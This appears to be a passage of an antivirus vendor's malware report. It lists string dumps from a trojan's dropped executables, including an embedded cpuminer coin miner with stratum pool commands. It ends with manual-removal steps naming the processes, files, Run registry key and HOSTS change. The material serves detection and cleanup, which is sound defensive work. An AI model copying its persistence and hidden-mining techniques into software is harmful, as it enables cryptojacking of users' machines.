`.rdata
@.data
SSSSSh
.pHUf
\$HSSSh
~3SSSh0
SSShPbC
SSShP
toSSShPbC
t}SSSh
u3SSShP
tBSSSh 'E
SSSh 'E
~
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
GetProcessHeap
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
pozlrpaqbu.exe
qsxdn.exe
alccsjb.exe
Ca.Dq ~
.hh#HD
0mw%fV
JW%%Cp3F
e.aQ{
%uKJ}W
;ÅM
@#.df
-)*%u
"B.gX1
zcÁ
%Documents and Settings%\LocalService
%System%\alccsjb.exe
mscoree.dll
KERNEL32.DLL

zcwj1w7efm80qsxdn.exe_880:


.text
`.rdata
@.data
SSSSSh
.pHUf
\$HSSSh
~3SSSh0
SSShPbC
SSShP
toSSShPbC
t}SSSh
u3SSShP
tBSSSh 'E
SSSh 'E
~
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
GetProcessHeap
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
pozlrpaqbu.exe
qsxdn.exe
alccsjb.exe
Ca.Dq ~
.hh#HD
0mw%fV
JW%%Cp3F
e.aQ{
%uKJ}W
;ÅM
@#.df
-)*%u
"B.gX1
zcÁ
%Documents and Settings%\LocalService
%WinDir%\TEMP\zcwj1w7efm80qsxdn.exe
mscoree.dll
KERNEL32.DLL

win32drkclient.exe_2236:


.text
``.data
.rdata
`@.bss
.idata
\\\\5\\\\
|$@3\$,3\$0
\$$!|$$!
|$ 1|$41
\$0#\$(1
|$\3|$81
\$\3\$`3
""""%""""1
1|$,1\$,
\$\3\$ 1|$(
\$43\$01
\$ 3\$41
1\$,1|$,
\$ 3\$(3\$8
|$03|$43|$@
|$,3|$83|$ 3|$
libgcj-13.dll
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
cpuminer 2.3.2
DEBUG: job_id='%s' extranonce2=%s ntime=x
JSON decode of %s failed
http://
https://
stratum tcp://
http://%s
Starting Stratum on %s
...terminating workio thread
...retry after %d seconds
JSON decode failed(%d): %s
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "getwork", "params": [ "%s" ], "id":1}
Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
JSON key '%s' not found
JSON key '%s' is not a string
CURL initialization failed
%s%s%s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
http://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
JSON option %s invalid
https:
%s:%s
thread %d create failed
%d miner threads started, using '%s' algorithm.
cert
userpass
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
DEBUG: %s
Hash: %s
Target: %s
http%s
http_proxy
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
mining.notify
Stratum session id: %s
mining.set_difficulty
client.reconnect
stratum tcp://%s:%d
Server requested reconnection to %s
client.get_version
cpuminer/2.3.2
client.show_message
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
#"! '&%$ *)(/.-,32107654;:98?>=<2
tXXFr.rh.44Aw-wl-66
r.rh.44Fw-wl-66A
.rh.44Fr-wl-66Aw
O9K\9..eKW
trh.44Fr.wl-66Aw-
K\9..eK9
h.44Fr.rl-66Aw-w
O\9..eK9K=W
.44Fr.rh-66Aw-wl
9..eK9K\W
t44Fr.rh.66Aw-wl-
..eK9K\9
tX4Fr.rh.46Aw-wl-6
.eK9K\9.
7.35.0
smtp
tftp
getpeername() failed with errno %d: %s
getsockname() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Could not set TCP_NODELAY: %s
TCP_NODELAY set
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
Immediate connect fail for %s: %s
Couldn't bind to '%s'
connect to %s port %ld failed: %s
Failed to connect to %s port %ld: %s
[%s %s %s]
Send failure: %s
Recv failure: %s
Write callback asked for PAUSE when not supported!
%s:%d
Hostname was %sfound in DNS cache
timeout on name lookup is not supported
%5[^:]:%d:%5s
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
IDN support not present, can't parse Unicode domains
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Connected to %s (%s) port %ld (#%ld)
User-Agent: %s
[^:]:%[^
:]://%[^
 malformed
SMTP.
Rebuilt URL to: %s
Protocol %s not supported or disabled in libcurl
%s://%s
[%*45[0123456789abcdefABCDEF:.]%c
;type=%c
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Couldn't find host %s in the _netrc file; using defaults
[email protected]
Found bundle for host %s: %p
Server doesn't support pipelining
Found connection %ld, with requests in the pipe (%zu)
Re-using existing connection! (#%ld) with host %s
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
Connection #%ld to host %s left intact
Curl_poll(%d ds, %d ms)
Internal error clearing splay node = %d
Internal error removing splay node = %d
Pipe broke: handle 0x%p, url = %s
In state %d with no easy_conn, bail out!
Operation timed out after %ld milliseconds with %I64d out of %I64d bytes received
Operation timed out after %ld milliseconds with %I64d bytes received
#HttpOnly_
23[^;
=]=I99[^;
httponly
skipped cookie with bad tailmatch domain: %s
%s cookie %s="%s" for domain %s, path %s, expire %I64d
# Netscape HTTP Cookie File
# http://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
WARNING: failed to save cookies in %s
%d.%d.%d.%d
CURLSHcode unknown
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
Please call curl_multi_perform() soon
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: unknown PASS reply
FTP: Accepting server connect has timed out
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Problem with the SSL CA cert (path? access rights?)
Error in the SSH layer
Issuer check against peer certificate failed
FTP: The server did not accept the PRET command.
Unable to parse FTP file list
0123456789
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
Curl_ipv4_resolve_r failed for %s
%sAuthorization: Basic %s
HTTP/
Avoided giant realloc for header (max is %d)!
The requested URL returned error: %d
%s auth using %s with user '%s'
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Referer: %s
Accept-Encoding: %s
Host: %s%s%s
Host: %s%s%s:%hu
ftp://
Range: bytes=%s
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s/%I64d
ftp://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
Chunky upload is not supported by HTTP 1.0
HTTP error before end of send, stop sending
HTTP/%d.%d =
HTTP =
RTSP/%d.%d =
The requested URL returned error: %s
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
USER %s
PBSZ %d
Failure sending QUIT command: %s
ftp server doesn't support SIZE
RETR %s
Connect data stream passively
APPE %s
STOR %s
SIZE %s
getsockname() failed: %s
failed to resolve the address provided to PORT: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) failed: %s
bind() failed, we ran out of ports!
socket failure: %s
%s |%d|%s|%hu|
Failure sending EPRT command: %s
,%d,%d
%s %s
Failure sending PORT command: %s
Uploading to a URL without a file name!
FTPS not supported!
PASS %s
ACCT %s
Access denied: d
%c%c%c%u%c
Illegal port number in EPSV reply
%d,%d,%d,%d,%d,%d
Skips %d.%d.%d.%d for data connection, uses %s instead
Bad PASV/EPSV response: d
Can't resolve proxy host %s:%hu
Can't resolve new host %s:%hu
Connecting to %s (%s) port %d
TYPE %c
MDTM %s
CWD %s
PRET %s
PRET STOR %s
PRET RETR %s
REST %d
FTP response timeout
FTP response aborted due to select/poll error: %d
Preparing for accepting server on data port
Got a d ftp-server response when 220 was expected
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
AUTH %s
ACCT rejected by server: d
PROT %c
Entry path is '%s'
QUOT command failed with d
MKD %s
Failed to MKD dir: d
dddddd
ddd d:d:d GMT
Last-Modified: %s, d %s M d:d:d GMT
unsupported MDTM reply format
Got a d response code instead of the assumed 200
PRET command not accepted: d
Failed to do PORT
RETR response: d
Failed FTP upload: 
Wildcard - START of "%s"
Wildcard - "%s" skipped by user
ftp_perform ends with SECONDARY: %d
Remembering we are in dir "%s"
Failure sending ABOR command: %s
server did not report OK, got %d
QUOT string not accepted: %s
PORT
%s IAC %s
%s IAC %d
%s %s %s
%s %s %d
%s %d %d
Sending data failed (%d)
%s IAC SB
%s (unsupported)
%d (unknown)
%c%c%c%c%s%c%c
%c%c%c%c
7[^,],7s
%c%s%c%s
USER,%s
7[^= ]%*[ =]%5s
Syntax error in telnet option: %s
Unknown telnet option %s
WSAStartup failed (%d)
insufficient winsock version to support telnet
failed to load WS2_32.DLL (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEnumNetworkEvents function (%d)
WSACreateEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACloseEvent failed (%d)
FreeLibrary(wsock2) failed (%d)
WS2_32.DLL
CLIENT libcurl 7.35.0
MATCH %s %s %s
DEFINE %s %s
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: %s
LDAP local: Cannot connect to %s:%ld
LDAP local: ldap_simple_bind_s %s
LDAP remote: %s
There are more than %d entries
LDAP local: trying to establish %s connection
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Received last DATA packet block %d again.
Received unexpected DATA packet block %d, expecting block %d
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: internal error
set timeouts for state %d; Total %ld, retry %d maxtry %d
Received ACK for block %d, expecting %d
tftp_tx: giving up waiting for block %d ack
tftp_tx: internal error, event: %i
bind() failed; %s
%s%c%s%c
tftp_send_first: internal error
TFTP finished
TFTP response timeout
got option=(%s) value=(%s)
blksize is larger than max supported
%s (%d)
blksize is smaller than min supported
%s (%ld)
%s (%d) %s (%d)
invalid tsize -:%s:- value in OACK packet
TFTP
%cd
LIST "%s" *
FETCH %s BODY[%s]
LOGIN
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
No known authentication mechanisms supported!
IMAPS not supported!
Access denied: %d
APPEND %s (\Seen) {%I64d}
SELECT %s
LOGINDISABLED
STARTTLS not supported.
STARTTLS denied. %c
Access denied. %c
Authentication failed: %d
AUTH %s %s
POP3S not supported!
APOP %s %s
STLS not supported.
RCPT TO:%s
RCPT TO:<%s>
SMTPS not supported!
Got unexpected smtp-server response: %d
EHLO %s
HELO %s
Remote access denied: %d
Command failed: %d
MAIL failed: %d
RCPT failed: %d
DATA failed: %d
MAIL FROM:%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s SIZE=%s
SMTP
Refusing to issue an RTSP request [%s] without a session ID.
Transport:
Transport: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Range: %s
%s %s RTSP/1.0
Session: %s
%s%s%s%s%s%s
Unable to read the CSeq header: [%s]
Got RTSP Session ID Line [%s], but wanted ID [%s]
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
%%X
xxxx
%s:%s:%s
%s:%.*s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", cnonce="%s", nc=x, qop=%s, response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
SOCKS4 communication to %s:%d
SOCKS4 connect to %s (locally resolved)
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
login
password
operation aborted by callback
Read callback asked for PAUSE when not supported!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
Simulate a HTTP 304 response!
Problem (%d) in the Chunked-Encoded data
Rewinding stream by : %zu bytes on url %s (size = %I64d, maxdownload = %I64d, bytecount = %I64d, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d
No URL set!
[^?&/:]://%c
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
Conn: %ld (%p) Receive pipe weight: (%I64d/%zu), penalized: %s
Site %s:%d is pipeline blacklisted
Server %s is not blacklisted
Server %s is blacklisted
d:d:d
d:d
%c%c==
%c%c%c=
------------------------xx
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
.jpeg
.html
0123456789-
%s xxxxxxxxxxxxxxxx
%s/%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
user=%s
auth=Bearer %s
%s near '%s'
%s near end of file
unable to decode byte 0x%x at position %d
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
end == saved_text   lex->saved_text.length
unable to open %s: %s
\ux
\ux\ux
Assertion failed: (%s), file %s, line %d
M%p %d %s
M%p %d V=%0X B=%d t=%d o=%d C=%d R=%d H=%p %s
once %p is %d
T%p %d %s
T%p %d V=%0X H=%p %s
C%p %d %s
C%p %d V=%0X B=%d b=%p w=%ld %s
RWL%p %d %s
RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s
_matherr(): %s in %s(%g, %g) (retval=%g)
VirtualQuery failed for %d bytes at address %p
VirtualProtect failed with code 0x%x
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
unknown option -- %s
unknown option -- %c
option requires an argument -- %s
option requires an argument -- %c
jZGCC: (GNU) 4.8.2 20131016 (Fedora MinGW 4.8.2-1.fc20)
GCC: (GNU) 4.8.2 20131016 (Fedora MinGW 4.8.2-1.fc20)
PeekNamedPipe
_acmdln
_amsg_exit
ldap_msgfree
ADVAPI32.dll
KERNEL32.dll
msvcrt.dll
USER32.dll
wldap32.dll
WS2_32.dll
"@"@"@"@
File: %ws, Line %u

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:1968
   zcwj1w7efz3kqsxdn.exe:2252
   zcwj1w7efe89qsxdn.exe:240
   zcwj1w7efm80qsxdn.exe:880
   alccsjb.exe:3776
   zcwj1w7efav5qsxdnln67pfy.exe:2384
   pozlrpaqbu.exe:1560
   pozlrpaqbu.exe:3076

2. Delete the original Malware file.
   
3. Delete or disinfect the following files created/modified by the Malware:
   

   %System%\mjbaidfvllkvssl\tst (10 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\zcwj1w7efav5qsxdnln67pfy.exe (3911 bytes)
   %System%\mjbaidfvllkvssl\etc (10 bytes)
   %System%\pozlrpaqbu.exe (5873 bytes)
   %System%\drivers\etc\hosts (22 bytes)
   %System%\mjbaidfvllkvssl\cfg (821 bytes)
   %System%\mjbaidfvllkvssl\run (10 bytes)
   %System%\win64drkaesent.exe (67687 bytes)
   %WinDir%\Temp\zcwj1w7efyx1qsxdn.exe (1940 bytes)
   %System%\win64drkclient.exe (68472 bytes)
   %System%\mjbaidfvllkvssl\ihst (226 bytes)
   %System%\alccsjb.exe (5873 bytes)
   %WinDir%\Temp\zcwj1w7efm80qsxdn.exe (5873 bytes)
   %System%\win32drkclient.exe (25340 bytes)
   %System%\mjbaidfvllkvssl\por (1 bytes)
   %WinDir%\Temp\zcwj1w7efe89qsxdn.exe (35 bytes)
   %System%\mjbaidfvllkvssl\rng (192 bytes)
   %WinDir%\Temp\zcwj1w7efz3kqsxdn.exe (35 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "COM Sharing Registrar CardSpace Detection" = "%System%\pozlrpaqbu.exe"

5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
   127.0.0.1 localhost
   
6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.